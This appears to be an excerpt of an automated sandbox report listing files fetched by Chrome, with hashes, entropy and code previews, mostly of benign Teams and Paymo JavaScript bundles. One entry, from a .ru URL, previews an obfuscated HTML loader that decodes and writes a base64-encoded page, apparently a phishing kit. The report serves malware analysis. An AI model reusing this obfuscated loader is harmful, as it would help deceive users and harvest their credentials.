                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[367927],{367927:(e,t,s)=>{s.d(t,{LF:()=>I,gm:()=>q,K9:()=>F,iA:()=>w,uH:()=>T,VB:()=>j,CP:()=>y,nQ:()=>L,Kh:()=>M,bN:()=>C,h7:()=>n,R5:()=>o,rg:()=>k,GD:()=>N,Jm:()=>E,_A:()=>cs,hC:()=>gs,pf:()=>bs,$x:()=>_s,E0:()=>xe,$d:()=>us,Az:()=>ms,S:()=>ds,TP:()=>fs,be:()=>hs,mz:()=>vs,U6:()=>Pe,xR:()=>Es,yH:()=>Se});var i=s(838369);const n="data-tabster",o="data-tabster-dummy",r=["a[href]","button:not([disabled])","input:not([disabled])","select:not([disabled])","textarea:not([disabled])","*[tabindex]","*[contenteditable]","details > summary","audio[controls]","video[controls]"].join(", "),a=1,l=2,c=3,u=0,d=1,h=2,_=0,m=1,f=2,b=3,v=4,g=0,p=1,E={Invisible:0,PartiallyVisible:1,Visible:2},y={Source:0,Target:1},w={Both:0,Vertical:1,Horizontal:2,Grid:3,GridLinear:4},T={ArrowUp:1,ArrowDown:2,ArrowLeft:3,ArrowRight:4,PageUp:5,PageDown:6,Home:7,End:8},F={Unlimited:0,Limited:1,LimitedTrapFocus:
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (64536)
                                Category:downloaded
                                Size (bytes):176159
                                Entropy (8bit):5.049453477483095
                                Encrypted:false
                                SSDEEP:
                                MD5:7E46B2413D01E748FB0A6EF035DC6A0F
                                SHA1:4B8D9EFE8EC9BAB2E1A611691024F7F8052AE7DA
                                SHA-256:9D97118DE6CCAFD3CE1CB05EC25871356F71AF598D202825F43F9F87AD92830A
                                SHA-512:09A75897517DF96BE3578914F0260A4BCA270F776A59F23D480180EAE9E13F3C0EDEEBDFDE74DDD7AD5608B084126F96DBD2FDF11E9FB96A9DD8C53DB0F8435F
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/paymo-icons/3.182.63/system/index.js
                                Preview:System.register(["react"],(function(e,l){"use strict";var s;return{setters:[e=>{s=e.default}],execute:function(){var l={exports:{}},t={};Object.getOwnPropertySymbols,Object.prototype.hasOwnProperty,Object.prototype.propertyIsEnumerable;!function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var l={},s=0;s<10;s++)l["_"+String.fromCharCode(s)]=s;if("0123456789"!==Object.getOwnPropertyNames(l).map((function(e){return l[e]})).join(""))return!1;var t={};return"abcdefghijklmnopqrst".split("").forEach((function(e){t[e]=e})),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},t)).join("")}catch(i){return!1}}()||Object.assign;./** @license React v17.0.2. * react-jsx-runtime.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):97386
                                Entropy (8bit):5.409202916101396
                                Encrypted:false
                                SSDEEP:
                                MD5:DEB6CC65C69E068DFB8E094926954D7F
                                SHA1:1FB93B19BC2FA21B1BF08BE5916FB62D34F3438E
                                SHA-256:C6074B5366BBDEC84AAF41BC66C753A96F3850C5A9E3F8974073B32F2956CEE8
                                SHA-512:54DB639E45E7904BD9C3C36ED8C555FEBFD5CA1C8381E61056BE75B4138A6638B1120C031FFBCEF6D316C5150E47796A76B082D48E7D57237A10F69D11917D50
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/747607-e867fd4c0b2c8d0f.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[747607],{872994:(n,t,e)=>{e.d(t,{_:()=>H});var r=e(340415),i=e(344411),u=e(759377),o=e(179233),a=e(680828),c=e(260026),f=e(215729),l=e(490507),s=e(722990),v=e(268288),d=e(498863),g=e(661187),h=e(952741),y=e(246904),p=e(483152),m=e(679080),b=e(779497),I=e(287856);var S,w=function(n){function t(){var e,r,u=n.call(this)||this;function a(){e=0,r=[]}return u.identifier="TelemetryInitializerPlugin",u.priority=199,a(),(0,i.A)(t,u,(function(n,t){n.addTelemetryInitializer=function(n){return function(n,t,e){var r={id:t,fn:e};return(0,o.Yny)(n,r),{remove:function(){(0,o.Iuo)(n,(function(t,e){if(t.id===r.id)return n[c.Ic](e,1),-1}))}}}(r,e++,n)},n[y.qT]=function(t,e){(function(n,t,e){for(var r=!1,i=n[c.oI],u=0;u<i;++u){var a=n[u];if(a)try{if(!1===a.fn[c.y9](null,[t])){r=!0;break}}catch(n){(0,g.ZP)(e,2,64,"Telemetry initializer failed: "+(0,h.lL)(n),{exception:(0,o.mmD)(n)},!0)}}return!r}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (44425)
                                Category:downloaded
                                Size (bytes):44533
                                Entropy (8bit):5.270142196256675
                                Encrypted:false
                                SSDEEP:
                                MD5:B7289244C39667518303834AF67B17F2
                                SHA1:A08B19A0A3EB54A16976EC1A606504130ABBB467
                                SHA-256:D85996B603536F1616663A2D7077C2EAD6EA2F7BCC5108AA4C29051A52B57A68
                                SHA-512:7940135EF7D4DE0F1F38E7468413E1D4FA97C5B89AA1E91198BA8B4D1F3B91D366E3A2080ED008B2C587D57D7CA99CCECEF6C6375F3300373CD493499E63F5C9
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/381452-be282a834691e600.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[381452],{95110:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,o=new Array(t);n<t;n++)o[n]=e[n];return o},e.exports.__esModule=!0,e.exports.default=e.exports},952002:(e,t,n)=>{var o=n(95110);e.exports=function(e){if(Array.isArray(e))return o(e)},e.exports.__esModule=!0,e.exports.default=e.exports},119666:(e,t,n)=>{"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{A:()=>o})},63428:(e,t,n)=>{"use strict";function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function i(e,t,n){return t&&o(e.prototype,t),n&&o(e,n),Object.defineProperty(e,"prototype",{writable:!1}),e}n.d(t,{A:()=>i})},426220:(e,t,n)=>{"use strict";function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (60240)
                                Category:dropped
                                Size (bytes):60348
                                Entropy (8bit):4.483293718479703
                                Encrypted:false
                                SSDEEP:
                                MD5:B445DBDD2330900E22E737DE4C72215D
                                SHA1:53F4297A5CAE9D4B7C576DBEE5A413AE85F39A8C
                                SHA-256:33A7F949CBB18F9B050399510CC0F9D0DD3855311ABE2D662C13B59C5C82680B
                                SHA-512:BD46D44EC8E7127E019DE6FF15E88562E2DA9730203229AA0D2C48F13B1380A4D84F391F0D8FC12D9C821A691612E2C5AB68898861C449CD21F7CB1F629BF0CF
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[750818],{750818:(a,l,Z)=>{Z.d(l,{_jO:()=>e,iNx:()=>m,gcm:()=>h,_Xk:()=>v,IjV:()=>M,Ylq:()=>H,W_M:()=>r,yuG:()=>i,NGN:()=>V,nUb:()=>o,oAB:()=>U,Crl:()=>A,tyz:()=>C,LKJ:()=>t,xeZ:()=>L,dbj:()=>d,Cke:()=>u,aUo:()=>n,dgX:()=>s,lr5:()=>g,k$2:()=>R,m_5:()=>F,BKw:()=>D,Njq:()=>p,QWN:()=>k,CX7:()=>f,V6R:()=>w,Xwn:()=>E,nvQ:()=>y,XUe:()=>S,c4C:()=>O,yly:()=>b,_B:()=>j,wSM:()=>_,onv:()=>B,iG:()=>x,nrH:()=>P,J3O:()=>T,qQV:()=>W,ALn:()=>Q,$HY:()=>q,ZJc:()=>N,MVw:()=>z,akU:()=>X,WhM:()=>G,CbY:()=>$,WHO:()=>I,k_r:()=>J,POZ:()=>K,Lpw:()=>Y,OGg:()=>aa,O6n:()=>la,pQD:()=>Za,jsk:()=>ca,FT3:()=>ea,Htf:()=>ma,xhg:()=>ha,d_C:()=>va,f8w:()=>Ma,pwR:()=>Ha,sVb:()=>ra,iil:()=>ia,Enj:()=>Va,Qvr:()=>oa,zBW:()=>Ua,LWr:()=>Aa,d0y:()=>Ca,cBQ:()=>ta,Ult:()=>La,pyq:()=>da,smH:()=>ua,Gdy:()=>na,f0V:()=>sa,VEF:()=>ga,yus:()=>Ra,IN0:()=>Fa,olq:()=>Da,W6w:()=>pa,Sz$:()=>ka,y7H:()=>fa,p$u:()=>wa,ntX:()=>Ea,DxS:(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (2823)
                                Category:downloaded
                                Size (bytes):2824
                                Entropy (8bit):5.147262734783416
                                Encrypted:false
                                SSDEEP:
                                MD5:F1CAC7F4D76C6C619D733FB7407E8DE2
                                SHA1:DFC8234EDE4CF3F2F63CF25648D74095E2095D38
                                SHA-256:4AF3B081014CFEABE4810C0CD1ED3CCC3149C00243553D30674A14657A381FB2
                                SHA-512:C3E1FFF34F8B8BF205CC7E308B05422C9FA09F23E098270D6B81113E0CAE25D85D953025674EF79866BED8E99AA00ABA98823FE148EDBF5BF823306E581B27CF
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/tslib.es6-3ac6cc9f.js
                                Preview:System.register([],function(f,g){"use strict";return{execute:function(){f({a:h,b:O,c:b,d:w,e:d});var s=function(u,o){return s=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,r){e.__proto__=r}||function(e,r){for(var c in r)Object.prototype.hasOwnProperty.call(r,c)&&(e[c]=r[c])},s(u,o)};function h(u,o){if(typeof o!="function"&&o!==null)throw new TypeError("Class extends value "+String(o)+" is not a constructor or null");s(u,o);function e(){this.constructor=u}u.prototype=o===null?Object.create(o):(e.prototype=o.prototype,new e)}var _=f("_",function(){return f("_",_=Object.assign||function(o){for(var e,r=1,c=arguments.length;r<c;r++){e=arguments[r];for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(o[t]=e[t])}return o}),_.apply(this,arguments)});function b(u,o){var e={};for(var r in u)Object.prototype.hasOwnProperty.call(u,r)&&o.indexOf(r)<0&&(e[r]=u[r]);if(u!=null&&typeof Object.getOwnPropertySymbols=="function")for(var c=0,r=Object.getOwnPropertySymbols(u);c<r.l
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (19736)
                                Category:dropped
                                Size (bytes):5292071
                                Entropy (8bit):6.003548249796677
                                Encrypted:false
                                SSDEEP:
                                MD5:EBDA75E412249836AAEE591A85DA8540
                                SHA1:48F84AE5F96EF5EC5E7E5E215B7F573DD3846CC3
                                SHA-256:32C6013731B9662568A7F070A25C97B8E3F9A2D8670C7F5460B1EF94FA224A8D
                                SHA-512:743DBB92130C87025F911788656D3E9BF093E79F6DDD7D12DEE40D23CC9FEA087E8A96C4A7133D0F1665A1C36BB3C27C6E1723C75FB9F534DF0D9908E690084C
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register(["react","react-dom","@paymo/paymo-icons","@paymo/company-settings-data","@paymo/translation","@paymo/event-bus","@paymo/feature-announcement","@paymo/ui-state"],function(J,Qo){"use strict";var Y,Tt,Ki,d,D9,oL,IC,Te,Je,He,ie,_,H,HT,ES,fM,np,DC,au,EC,aL,E9,b9,bS,S9,v9,Sl,x9,SS,TM,O9,vS,_9,z9,k9,R9,P9,Y9,xS,U9,OS,lL,$T,qT,B9,F9,G9,W9,_S,zS,kS,Q9,RS,V9,Z9,H9,$9,q9,K9,PS,J9,X9,eQ,tQ,nQ,rQ,iQ,sQ,oQ,aQ,lQ,cQ,uQ,MQ,we,vi,dQ,YS,pQ,KT,gQ;return{setters:[Ct=>{Y=Ct,Tt=Ct.forwardRef,Ki=Ct.useContext,d=Ct.default,D9=Ct.Children,oL=Ct.isValidElement,IC=Ct.cloneElement,Te=Ct.useState,Je=Ct.useRef,He=Ct.useEffect,ie=Ct.memo,_=Ct.useCallback,H=Ct.useMemo,HT=Ct.useLayoutEffect,ES=Ct.Fragment,fM=Ct.createContext,np=Ct.PureComponent,DC=Ct.useImperativeHandle,au=Ct.Component,EC=Ct.createElement},Ct=>{aL=Ct.default,E9=Ct,b9=Ct.render,bS=Ct.unmountComponentAtNode,S9=Ct.flushSync,v9=Ct.createPortal},Ct=>{Sl=Ct.Close,x9=Ct.Visibility,SS=Ct.QuestionMark,TM=Ct.ArrowDropdown,O9=Ct.GoToLink,vS=Ct.S
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (8127)
                                Category:dropped
                                Size (bytes):8235
                                Entropy (8bit):4.478708887162824
                                Encrypted:false
                                SSDEEP:
                                MD5:8EA58F112F601CFF7AA2D7675882B65E
                                SHA1:115284DC07B6527AC92A9A6640651995613499BE
                                SHA-256:A2481FF7560DC2909D030DC4D7303BCF0E30BB65AA09960B9D6E8D93A7A36A84
                                SHA-512:A67DABF2B3FA32FD3B81A5A0DC32E1A7F286B69FBE6D5D07A614610721606FBBC154D2DFE060497E506A62B854BD46BCEFA625D1629AECCF3504F0B33670CABA
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[119068],{119068:(a,l,Z)=>{Z.d(l,{JuR:()=>v,uUQ:()=>h,p46:()=>L,IyQ:()=>m,HMO:()=>r,nfo:()=>H,Dd:()=>c,ICI:()=>M,Cr5:()=>V,zeV:()=>A,do:()=>t,gke:()=>u,AqU:()=>U,ue5:()=>S,S6q:()=>d,lq8:()=>g,z6r:()=>i,qVr:()=>R,xge:()=>s,X_q:()=>k});var e=Z(693935);const v=(0,e.U)("Sparkle20Regular","20",["M7.4 12.8a1.04 1.04 0 0 0 1.59-.51l.45-1.37a2.34 2.34 0 0 1 1.47-1.48l1.4-.45A1.04 1.04 0 0 0 12.25 7l-1.37-.45A2.34 2.34 0 0 1 9.4 5.08L8.95 3.7a1.03 1.03 0 0 0-.82-.68 1.04 1.04 0 0 0-1.15.7l-.46 1.4a2.34 2.34 0 0 1-1.44 1.45L3.7 7a1.04 1.04 0 0 0 .02 1.97l1.37.45a2.33 2.33 0 0 1 1.48 1.48l.46 1.4c.07.2.2.37.38.5Zm.08-7.4.53-1.38.44 1.37a3.33 3.33 0 0 0 2.12 2.12l1.4.53-1.38.45a3.34 3.34 0 0 0-2.11 2.11l-.53 1.38-.45-1.38a3.34 3.34 0 0 0-2.1-2.12L4 7.96 5.4 7.5a3.36 3.36 0 0 0 2.08-2.12Zm6.06 11.45a.8.8 0 0 0 1.22-.4l.25-.76a1.09 1.09 0 0 1 .68-.68l.77-.25a.8.8 0 0 0-.02-1.52l-.77-.25a1.0
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (57138)
                                Category:dropped
                                Size (bytes):57246
                                Entropy (8bit):5.5255246496960755
                                Encrypted:false
                                SSDEEP:
                                MD5:0A6903B0C0DCC547CA7FA6AFEC635D78
                                SHA1:D63E014794AC8D7BEDEA72C6FEDA13FBD08E989B
                                SHA-256:1494A9B97D2E7F5DE852399FEE596954A438792BAFBA1480CCA60F45FF293177
                                SHA-512:7C07F4C0815C694E8C62D799A60EA0E9ABFBE488A08EB8F48C7AE4CF5C0D26A1839D3747497E2A4474860191F6C6213110799568B37AE48D7EF998A91957CA5B
                                Malicious:false
                                Reputation:unknown
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[336776],{911717:(e,t,n)=>{"use strict";n.d(t,{w:()=>a});var r=n(783148);class a{constructor(e,t){this.value=e,this.piiKind=t}static isPIIValue(e){return!!e&&"string"!=typeof e&&void 0!==e.scrub}scrub(){return(0,r.sha256)(JSON.stringify(this.value))}}},276201:(e,t,n)=>{"use strict";n.d(t,{$:()=>a});var r=n(34655);function a(e){if(!e||"object"!=typeof e)return!1;if("RegionGtmNotFoundInRespone"===e.errorCode)return!0;const t=e;return t.code===r.O4.InvalidResponse&&"Discover"===t.context&&"regionGtm"===t.subContext}},396949:(e,t,n)=>{"use strict";var r,a;n.d(t,{I:()=>r}),function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (13238)
                                Category:dropped
                                Size (bytes):13239
                                Entropy (8bit):5.418334995728157
                                Encrypted:false
                                SSDEEP:
                                MD5:A37545F9F7D998126AE1821E00A51067
                                SHA1:6D8203F54099A2D167F679EC1E34A569A1A68F2C
                                SHA-256:AC5BE0EBB2652B8A9E2FA4F27F1B4CD382046FBC66EE05EAF5F2DC2B089BA890
                                SHA-512:76D1A137DF064D93146963382D5C80A634743D1742B2C57FDDE7462984D39FF46DC120D41FD9E3DADD3FCCB2B2D9264B13DD67B4BD0870380A6C6A6ABB8DD5EF
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register(["react","@paymo/shared-components","@paymo/lists","@paymo/translation","../index-b0302b44.js","@paymo/paymo-icons","../print-6c18bf44.js","../paid-bfac7e4a.js","../TranslationProvider-f13b9eaa.js","@paymo/company-settings-data","@paymo/shared-libraries/apollo","@paymo/shared-libraries/lodash","@paymo/shared-libraries/form","@paymo/ui-state","@paymo/shared-libraries/hotkeys","@paymo/shared-libraries/yup","@paymo/shared-libraries/dnd-kit","@paymo/event-bus","@paymo/shared-libraries/apm"],(function(e,t){"use strict";var n,l,a,o,r,i,c,m,s,d,u,p,g,h,f,y,b,x,v,E,w,S,k,N,R,$,C;return{setters:[e=>{n=e.default,l=e,a=e.memo,o=e.useCallback,r=e.useState,i=e.useRef,c=e.useMemo},e=>{m=e.styled,s=e.Link,d=e.useDownloadPdf,u=e.useReactToPrint,p=e.Button,g=e.SvgIcon},null,e=>{h=e.useTranslation},e=>{f=e.F,y=e.a,b=e.V,x=e.u},e=>{v=e.AppTimesheets},e=>{E=e.S,w=e.a},e=>{S=e.S},e=>{k=e.S,N=e.T},e=>{R=e.fetchPolicy,$=e.appsConfigs,C=e.init},null,null,null,null,null,null,null,null,null],exe
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):1369479
                                Entropy (8bit):5.709861414101588
                                Encrypted:false
                                SSDEEP:
                                MD5:091C2714125D00617A346EAB795C0F52
                                SHA1:43A14735774B3D6DB05299B1E21EF96A42D6085B
                                SHA-256:1E4A6599B96B2506239551A3DAC5D3B54FF673CD88393C434BEF5ECE55B9AD63
                                SHA-512:6B14EE4461BA8AFFB7325C2821B7582E501599131A931DC3F9960D4D0FC9D14ABE14F528E29E31ABBC465132C05E4EF42B8B9677495B628F54B8D05F372E8C4C
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/griffel-e216e39f0b9c6ed0.css
                                Preview:.r1sgsif7{outline:2px solid var(--colorPaletteNavyBorderActive);}.ru42dn6{outline:2px solid var(--colorStatusDangerBackground3);}.rc5rb6b{list-style-type:none;display:flex;align-items:center;margin:0;padding:0;}.r1tl60rs{display:flex;align-items:center;color:var(--colorNeutralForeground2);box-sizing:border-box;text-wrap:nowrap;}.rk008qs{display:flex;}.rxqbxwz{color:inherit;font-family:inherit;padding:0px;border-style:none;-webkit-appearance:button;-moz-appearance:button;appearance:button;text-align:unset;background-color:transparent;display:flex;height:100%;align-items:center;border:var(--strokeWidthThin) solid var(--colorTransparentStroke);border-left-color:var(--colorNeutralStroke1);border-top-left-radius:var(--borderRadiusNone);border-bottom-left-radius:var(--borderRadiusNone);}.rxqbxwz[data-fui-focus-visible]{outline:var(--strokeWidthThick) solid var(--colorStrokeFocus2);}.rdjx360{color:inherit;font-family:inherit;padding:0px;border-style:none;-webkit-appearance:button;-moz-appeara
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (64446)
                                Category:dropped
                                Size (bytes):68286
                                Entropy (8bit):5.321011022812024
                                Encrypted:false
                                SSDEEP:
                                MD5:7B92CDB749BFB5EC18DECD3F8A07E20B
                                SHA1:E57F77F5880BC5A131C30123A54385FD159F8DFF
                                SHA-256:86016897489642A3F06EF5BF496BB2C4D7BD667FA9BCE00CE2416A262A8C6204
                                SHA-512:46E8D2167E6652C5D72879C2883B2C5D67C02DF99A8BD9EA2376687306DFA2D7F012F5A3630E09C5BB7D2C941126EB2BC249124B75D3D1ED1BC77407F96CF554
                                Malicious:false
                                Reputation:unknown
                                Preview:var fn=Object.defineProperty;var cn=($,D,U)=>D in $?fn($,D,{enumerable:!0,configurable:!0,writable:!0,value:U}):$[D]=U;var W=($,D,U)=>(cn($,typeof D!="symbol"?D+"":D,U),U);System.register(["react"],function($,D){"use strict";var U,he,K,Y,G,Pe,_,ee,Ne,je,Re;return{setters:[C=>{U=C.createContext,he=C.useContext,K=C.createElement,Y=C.isValidElement,G=C.cloneElement,Pe=C.useState,_=C.useRef,ee=C.useEffect,Ne=C.forwardRef,je=C.useMemo,Re=C.default}],execute:function(){$({Trans:en,useTranslation:et,withTranslation:un});const C={type:"logger",log(r){this.output("log",r)},warn(r){this.output("warn",r)},error(r){this.output("error",r)},output(r,e){console&&console[r]&&console[r].apply(console,e)}};class te{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.init(e,t)}init(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.prefix=t.prefix||"i18next:",this.logger=e||C,this.options=t,this.debug=t.debug}log(){for(var e=arguments.length,t=new Arra
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (462)
                                Category:downloaded
                                Size (bytes):463
                                Entropy (8bit):5.071476151592597
                                Encrypted:false
                                SSDEEP:
                                MD5:BE56817ACC4740A94A15B2E81674B9B2
                                SHA1:1739D0F335F25FD63EC25F6CBC2DE88693EB1BAB
                                SHA-256:0A4D4FE69EF57AB7EE85CAAAFFE168267C96A9FCEF8D3AEBECC3A1EF6B83D278
                                SHA-512:DFE12AA0A42B01E6437341BDF86CCDBE5F3DAE65624A5415F8BC77C8BD32EE92535DD5811B2A99D5B257C7D5B6F1696304AFC8395C599DAD6892B0D9C9896B72
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/system/lodash.js
                                Preview:System.register(["../lodash-b00d4de8.js","../_commonjsHelpers-6226bf47.js"],function(s,i){"use strict";var e;return{setters:[r=>{e=r.l},null],execute:function(){s({camelCase:e.camelCase,debounce:e.debounce,find:e.find,flowRight:e.flowRight,groupBy:e.groupBy,isArray:e.isArray,isEmpty:e.isEmpty,isEqual:e.isEqual,isObject:e.isObject,memoize:e.memoize,merge:e.merge,omit:e.omit,pick:e.pick,round:e.round,sortBy:e.sortBy,transform:e.transform,uniqBy:e.uniqBy})}}});.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):261
                                Entropy (8bit):4.834821220568514
                                Encrypted:false
                                SSDEEP:
                                MD5:4CD142D6E51B2F9C765A9DBDE4AD01A0
                                SHA1:9CB9CCCB9ED61702E5C97D4B3A80F4086A17BA73
                                SHA-256:274B91C88449D99BB7AA7564EC096F76ECEEF0627CC7E4966692C4C47122F590
                                SHA-512:8E2EC5E859F7EEAE58E21F565AC8260B2758BD30D5F5BCF331222DFB261859FD3EAC4C289372C45F4F792BD93B80B4D4C4DB188A3898E438B19131E8376A5F8E
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/system/form.js
                                Preview:System.register(["../form-45be5755.js","react"],function(e,t){"use strict";return{setters:[r=>{e({Controller:r.C,FormProvider:r.F,useController:r.e,useFieldArray:r.f,useForm:r.u,useFormContext:r.c,useFormState:r.b,useWatch:r.d})},null],execute:function(){}}});.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (7461), with CRLF line terminators
                                Category:downloaded
                                Size (bytes):19782
                                Entropy (8bit):5.879569721550546
                                Encrypted:false
                                SSDEEP:
                                MD5:67ECC5AB62C09AF3E714E895F0118088
                                SHA1:F65C15FC75832CE47717CBA0C26D6385943338C8
                                SHA-256:4F24A587937BAF38DEA481FE57DB39AC2BA422A04760A3D825941FBFF111D84B
                                SHA-512:B4B5D04A77EB3D3DEDAA03E938EB92E7F91E91658AE3E7A9DBC698BF8794721BB7ADCBE9D492E234AD043912A86C1B0A4AA38068E53F3AA272B80CCD4BD4891E
                                Malicious:false
                                Reputation:unknown
                                URL:https://whtt.termlicari.ru/HnkNbg/
                                Preview: Success seems to be connected with action. Successful people keep moving. -->..<script>....if(atob("aHR0cHM6Ly9XSHR0LnRlcm1saWNhcmkucnUvSG5rTmJnLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZ
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (21146)
                                Category:dropped
                                Size (bytes):25660
                                Entropy (8bit):5.122816088273399
                                Encrypted:false
                                SSDEEP:
                                MD5:E059C97C700AAF4D40B4657F9BF12F0D
                                SHA1:F9A77E59AA913B41A38611AD09792179F32EE3BF
                                SHA-256:96A4235A164A8EF916E456DDDD6DDCFE30B27C3B036CC7922B2F98B12CD637E9
                                SHA-512:B06216ABA20DDD36D8F05DD9F828B31EF30F2BFB8D835724AD91BEF41FE55938F4A8E6D14F716271BBD287B19C109C9C5AE2BD93D0739D08CB33E23D0BD192C7
                                Malicious:false
                                Reputation:unknown
                                Preview:var Pe=Object.defineProperty;var Te=(_,A,O)=>A in _?Pe(_,A,{enumerable:!0,configurable:!0,writable:!0,value:O}):_[A]=O;var Tt=(_,A,O)=>(Te(_,typeof A!="symbol"?A+"":A,O),O);System.register(["@paymo/shared-libraries/lodash"],function(_,A){"use strict";var O,tt,et;return{setters:[T=>{O=T.isEqual,tt=T.groupBy,et=T.camelCase}],execute:function(){var T=function(e,r){return T=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])},T(e,r)};function P(e,r){if(typeof r!="function"&&r!==null)throw new TypeError("Class extends value "+String(r)+" is not a constructor or null");T(e,r);function t(){this.constructor=e}e.prototype=r===null?Object.create(r):(t.prototype=r.prototype,new t)}function jt(e,r,t,n){function i(o){return o instanceof t?o:new t(function(u){u(o)})}return new(t||(t=Promise))(function(o,u){function s(f){try{c(n.next(f))}catch(m){u(m)}}function a(f){try{c(n.throw(f))}c
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (9012)
                                Category:downloaded
                                Size (bytes):9013
                                Entropy (8bit):4.899185416597595
                                Encrypted:false
                                SSDEEP:
                                MD5:B3DAEB32B0DA0F81E7C71494785C258C
